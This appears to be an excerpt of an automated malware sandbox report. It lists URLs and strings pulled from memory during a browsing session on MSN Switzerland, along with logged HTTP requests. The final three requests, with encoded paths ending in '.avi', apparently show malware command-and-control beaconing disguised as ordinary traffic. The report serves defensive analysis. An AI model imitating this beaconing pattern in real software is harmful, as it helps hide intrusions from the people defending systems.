                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
                      Source: de-ch[1].htm.6.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
                      Source: WerFault.exe, 00000023.00000002.429475012.0000000005347000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.453464879.0000000004DF2000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns#
                      Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns/fb#
                      Source: auction[1].htm.6.drString found in binary or memory: http://popup.taboola.com/german
                      Source: ~DF8EB834D22FF64704.TMP.4.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://amzn.to/2TTxhNg
                      Source: auction[1].htm.6.drString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
                      Source: auction[1].htm.6.drString found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=_pGcdKMGIS.z.lCTqTjkg1MN5VDhw.LVmKPE.vsvy8xqR9tt
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
                      Source: auction[1].htm.6.drString found in binary or memory: https://cdn.flurry.com/adTemplates/templates/htmls/clips.html&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_na
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://client-s.gateway.messenger.live.com
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24545562
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24545562&amp;epi=de-ch
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692
                      Source: ~DF8EB834D22FF64704.TMP.4.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
                      Source: ~DF8EB834D22FF64704.TMP.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                      Source: ~DF8EB834D22FF64704.TMP.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                      Source: auction[1].htm.6.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                      Source: auction[1].htm.6.drString found in binary or memory: https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&amp;es=ofrom5sGIS_KXxy9_JDp4mX9JHjHM.c541SmqMEFZwTH
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1631265095&amp;rver=7.0.6730.0&am
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/logout.srf?ct=1631265096&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1631265095&amp;rver=7.0.6730.0&amp;w
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/#qt=mru
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/about/en/download/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;Fotos
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://outlook.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/calendar
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
                      Source: auction[1].htm.6.drString found in binary or memory: https://policies.oath.com/us/en/oath/privacy/index.html
                      Source: ~DF8EB834D22FF64704.TMP.4.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
                      Source: auction[1].htm.6.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BWUYr.M5U6.kf035wsX8Lg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-nav
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
                      Source: auction[1].htm.6.drString found in binary or memory: https://srtb.msn.com:443/notify/viewedg?rid=8579855945c54b10b74180716ce798ce&amp;r=infopane&amp;i=3&
                      Source: imagestore.dat.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOgGQ4.img?h=368&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://support.skype.com
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://twitter.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://twitter.com/i/notifications;Ich
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;t
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/
                      Source: ~DF8EB834D22FF64704.TMP.4.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
                      Source: ~DF8EB834D22FF64704.TMP.4.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpo
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/die-schulen-sind-am-anschlag-ansteckungen-unter-ki
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/mit-dem-neubau-der-zurich-versicherung-ist-ein-wei
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/wie-ein-engl%c3%a4nder-seine-schwangere-frau-vor-c
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/betrunkener-kia-fahrer-30-streift-polizeiauto-und-haut-ab/ar-AA
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/blaualgen-tr%c3%bcben-den-z%c3%bcrichsee-bei-freienbach/ar-AAOf
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/frau-hielt-schafe-im-badezimmer-ihrer-mietwohnung/ar-AAOhQkc?oc
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/kanton-z%c3%bcrich-beerdigt-westtangente-wetzikon/ar-AAOi8HP?oc
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/nach-13-positiven-tests-drei-klassen-m%c3%bcssen-in-quarant%c3%
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/v%c3%b6llig-absurd-f%c3%bcnftkl%c3%a4ssler-m%c3%bcssen-trotz-qu
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport/other/seit-corona-kommt-es-vermehrt-zu-t%c3%a4tlichkeiten/ar-AAOf1Pv
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skype.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de/download-skype
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
                      Source: unknownDNS traffic detected: queries for: www.msn.com
                      Source: global trafficHTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: geolocation.onetrust.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /tag?o=6208086025961472&upapi=true HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: btloader.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /px.gif?ch=1&e=0.7442770494067928 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ad-delivery.netConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ad.doubleclick.netConnection: Keep-AliveCookie: IDE=AHWqTUmLaOp9iEghuZm4P0dJw9hUfO3C-7WsvHHj8XxLUXDn8JvgU1zZASjuR4p3
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F07804453bf90da635cf952e3d393ab12.png HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F26b7c43e8735f7408c60e41fb7e91ecd.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /lo/api/res/1.2/BWUYr.M5U6.kf035wsX8Lg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1pbmk7cT0xMDA-/https://s.yimg.com/av/ads/1621266752856-586.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: s.yimg.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F11b9f069e5e00ff6dd3050259af20493.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/ljDNkkzbV4a6qGMM6/1HExUGmQXVwO/frwWBEjdrZ4/d5S8UlSiYa0DzX/el9J2qXVIUyYCxMHHr91X/kizLttMGapdo5SvF/olXlCBP7aPqDsmB/ICQ2HKBamF1i_2Fxdj/ZsDmjnqFK/ytn9Ymr2xJl5Qy4kiXVc/IQDWlUGPzShrNYAjXzf/JPSl_2BD7pWwAJFNY_2B0f/3A3oDAh_2BF9_/2BxYBJaFI/UpWol9RI.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/cCdYQdt2tX8RhHk/neYfmVtOu_2BWHOxaX/ecV9VJIhq/XE4M5D_2FzTYipgQVzFy/24_2BtaWyVjXI2M_2FX/wa66wgzPqWCXC0kGRqyEUL/snesyfGZeTgvJ/569YwYUH/U86MzznZ70JhRKq9sWcaTd1/Hzb_2FFW0u/GZ5sESPD_2B5JLMQh/7K5kxREyrQ1n/mKmdzEvi70Tv5/6xorN.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/pHWWVyKJpE2g/nNZcTMutRbw/CCuOk7RvdVCDGz/STh4ftwA407S9VDDkvBy4/G7M_2BJ4E2bGBbf7/N4t3UKgsWntjM7M/mhCOIjxjlHyX4RUX7Q/Rdq3ib1hF/2fWqDSaJ9GA2yVZ_2Bgz/9iFlTX9OFyKHKxrjQJU/JYzhGNAUNkUKgLpHHU6bLf/nZUT_2BcMHeCkKwcWj/aMt.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
